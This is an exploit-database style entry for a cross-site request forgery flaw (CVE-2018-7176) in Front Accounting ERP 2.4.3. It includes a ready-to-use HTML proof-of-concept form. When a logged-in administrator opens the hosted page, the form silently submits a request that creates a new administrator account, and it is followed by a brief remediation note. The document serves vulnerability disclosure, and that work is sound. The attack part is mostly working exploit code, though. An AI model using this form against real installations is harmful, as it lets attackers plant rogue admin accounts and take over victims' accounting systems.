57 lines
No EOL
1.8 KiB
HTML
57 lines
No EOL
1.8 KiB
HTML
<!--
|
|
# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
|
|
# Date: 16-02-2018
|
|
# Exploit Author: Samrat Das
|
|
# Contact: http://twitter.com/Samrat_Das93
|
|
# Website: https://securitywarrior9.blogspot.in/
|
|
# Vendor Homepage: frontaccounting.com
|
|
# Version: 2.4.3
|
|
# CVE : CVE-2018-7176
|
|
# Category: WebApp ERP
|
|
|
|
1. Description
|
|
|
|
The application source code is coded in a way which allows malicious
|
|
crafted HTML page to be executed directly without any anti csrf
|
|
countermeasures.
|
|
|
|
2. Proof of Concept
|
|
|
|
1. Visit the application
|
|
2. Visit the User Permissions Page.
|
|
3. Goto add user, and create a csrf crafted exploit for the same ,
|
|
upon hosting it on a server and sending the link to click by victim, it
|
|
gets exploited.
|
|
|
|
Proof of Concept
|
|
|
|
Steps to Reproduce:
|
|
|
|
1. Create an HTML Page with the below exploit code:
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form action="
|
|
http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml"
|
|
method="POST" enctype="text/plain">
|
|
<input type="hidden" name="show_inactive"
|
|
value="&user_id=Newadmin&password=Newadmin&real_name=New%20Admin&phone=&email=&role_id=8&language=C&pos=1&print_profile=&rep_popup=1&ADD_ITEM=Add%20new&_focus=user_id&_modified=0&_confirmed=&_token=Ta6aiT2xqlL2vg8u9aAvagxx&_random=757897.6552143205"
|
|
/>
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
2 This hosted page upon being clicked by an logged in admin user will lead
|
|
to creation of a new malicious admin user.
|
|
|
|
3 POCs and steps:
|
|
https://securitywarrior9.blogspot.in/2018/02/cross-site-request-forgery-front.html
|
|
|
|
4. Solution:
|
|
|
|
Implement anti csrf token code in state changing http requests and validate
|
|
it at server side.
|
|
--> |